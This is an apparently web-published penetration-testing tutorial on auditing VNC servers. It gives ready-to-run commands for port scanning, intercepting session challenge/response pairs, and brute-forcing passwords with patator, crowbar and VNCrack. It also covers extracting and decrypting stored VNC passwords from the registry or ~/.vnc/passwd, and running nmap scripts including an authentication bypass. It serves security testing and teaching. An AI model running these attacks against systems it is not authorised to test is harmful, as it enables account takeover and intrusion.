VNC Security Audit
Table of contents
By default, the RFB uses a range of TCP ports from 5900 to 5906. Each port represents a corresponding X server screen (ports 5900 to 5906 are associated with screens from :0 to :6).
Java Viewer and HTTP VNC use port 5800.
The VNC viewer (client) in Listening mode listens on port 5500.
To scan a network in search of VNC servers and clients in listening mode:
sudo nmap -p 5500,5800,5900-5906 --open NETWORK
sudo nmap -p 5500,5800,5900-5906 --open 192.168.43.0/24
VNC sessions can be captured, for example, during man-in-the-middle attacks.
To retrieve the challenge and response of the VNC session, you can use Ettercap:
ettercap -Tq -r ФАЙЛ.pcapng
Using Wireshark Filters, you can conduct a detailed analysis of the VNC session:
To show only VNC session traffic:
The result of an authentication attempt on the VNC server:
The challenge, response, and result of an authentication attempt on a VNC server:
vnc.auth_challenge or vnc.auth_response or vnc.auth_result
Computer Name with VNC Server:
Mouse button position:
vnc.button_1_pos vnc.button_2_pos …………... vnc.button_8_pos
Security Type Selected:
VNC client protocol version:
VNC server protocol version:
Data of transmitted video in H.264 format:
You can use different methods to crack a VNC password:
- VNC session password cracking
- Decryption of the saved VNC server password
- Brute-force VNC server password
From the captured VNC session traffic, you need to extract the Authentication challenge and Authentication response. This method requiring a bit more preparation, but with it you will use force of Hashcat (the fastest offline brute-forcer). The detailed tutorial you will find in the article “How to crack VNC password from captured traffic (challenge response)”.
If you do not want to deal with the method described for Hashcat, then use the VNCrack program.
How to install VNCrack
Installation on Kali Linux
wget http://www.phenoelit.org/vncrack/vncrack_s.gz gunzip vncrack_s.gz chmod +x vncrack_s ./vncrack_s
Installation in BlackArch
sudo pacman -S vncrack
Installation in Widnows
Download the file http://www.phenoelit.org/vncrack/x4.exe and run it on the command line. See also “How to set up the PowerShell environment on Windows and Linux”.
To hack with VNCrack, you just need to specify the challenge, response and dictionary file, for example, hacking the password from the intercepted VNC session containing the challenge (-c 894443629f4a9675809cff5da2e84651) and the response (-r 271d94eb610b5c42588dc53506419e6a), using dictionary attack (-w passwords.txt):
vncrack -c 894443629f4a9675809cff5da2e84651 -r 271d94eb610b5c42588dc53506419e6a -w passwords.txt
Let's consider programs for online brute force password of VNC servers.
VNC servers reject connections after several unsuccessful attempts, so brute-force VNC needs to be performed in a single thread with a large interval between requests.
patator is one of the most versatile and flexible brute force software.
In the following example, the wait time between requests is set to 61 seconds:
patator vnc_login host=192.168.43.250 password=FILE0 0=passwords.txt -t 1 -x quit:code=0 -x ignore:fgrep='authentication rejected' -x ignore:fgrep='Authentication failure' --rate-limit=61
Examples of errors when the server rejected your connection without password verification:
- Session setup failed: "Your connection has been rejected.
- password check failed!
As you can see in the following screenshots, despite a long brute-force time and a couple of error messages, the passwords on the two VNC servers were cracked:
Crowbar (formerly known as Levye) is a brute force tool that can be used during penetration tests. It is designed to support protocols that are not currently supported by THC-Hydra and other popular brute force tools.
How to install crowbar
Installation on Kali Linux
sudo apt install crowbar freerdp2-x11 openvpn nmap
Installation in BlackArch
sudo pacman -S crowbar freerdp openvpn nmap
An example of a brute-force VNC service on a single host (-s 192.168.86.61/32) with a password dictionary (-C /root/words.txt) in 1 thread (-n 1):
crowbar -b vnckey -s 192.168.86.61/32 -C /root/words.txt -n 1
About the installation of the VNCrack program said a little higher.
Brute Force Launch Example:
vncrack -h 192.168.43.250 -w passwords.txt
The VNC server stores the password on the computer in encoded form. There are many ways to extract this password. Consider the programs and methods for decrypting a saved VNC server password.
VNCPassView is a small utility for recovering passwords stored by VNC tools.
VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):
The password is stored in binary form, its length is 8 bytes.
To read the password from the registry, you can use the commands to save registry fragments to .reg files, for example:
regedit.exe /E winvnc3.reg "HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\" regedit.exe /E winvnc4.reg "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4\"
Using VNCrack, you can extract the encoded password, to do this, run the program in interactive mode:
Then enter the bytes of password – two bytes per line, for example like this:
14 cc ac 84 2f 6f 8d 0d
As a result, all entered bytes and the encoded password will be displayed:
Entered HEX String: 14 cc ac 84 2f 6f 8d d VNC Password: 222222
On Linux, passwords can be stored anywhere, but the default file is ~/.vnc/passwd. To view it, open it with any editor capable of displaying hexadecimal data:
On Linux, you can also use the help of VNCrack:
vncrack -C ~/.vnc/passwd
Recovering the VNC server password stored in the ~/.vnc/passwd file:
Or you can use the method described by Bill Chaison: https://github.com/billchaison/VNCDecrypt. To do this, just run the command of the following form:
echo -n PASSWORD_BYTES | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
echo -n F0E43164F6C2E373 | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
NSE listing page (Nmap scripts): https://nmap.org/nsedoc/. The following scripts are present on it:
Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
Performs brute force password auditing against VNC servers.
Queries a VNC server for its protocol version and supported security types.
Tries to log into a VNC server and get its desktop name. Uses credentials discovered by vnc-brute, or None authentication types. If realvnc-auth-bypass was run and returned VULNERABLE, this script will use that vulnerability to bypass authentication.
To start, you need to use the --script option, after which you can specify a script, or several scripts separated by commas:
sudo nmap -p 5500,5800,5900-5906 --script realvnc-auth-bypass,vnc-brute,vnc-info,vnc-title HOST_OR_NETWORK
You can also use all the scripts as follows:
sudo nmap -p 5500,5800,5900-5906 --script 'vnc-*' HOST_OR_NETWORK
[WILL BE ADDED LATER]
Last Updated on
- How to install and configure RDP server on Linux (60%)
- NetBIOS: what it is, how it works and how to use in information security (59.9%)
- Introduction to IPv6 Addresses: How to Use and How to Explore the Network (Part 2) (54.9%)
- How to brute-force passwords using GPU and CPU in Linux (50.9%)
- How to install web server on Windows 10 (Apache 2.4, PHP 7, MySQL 8.0 and phpMyAdmin) (50%)
- How to protect GRUB bootloader with password (RANDOM - 50%)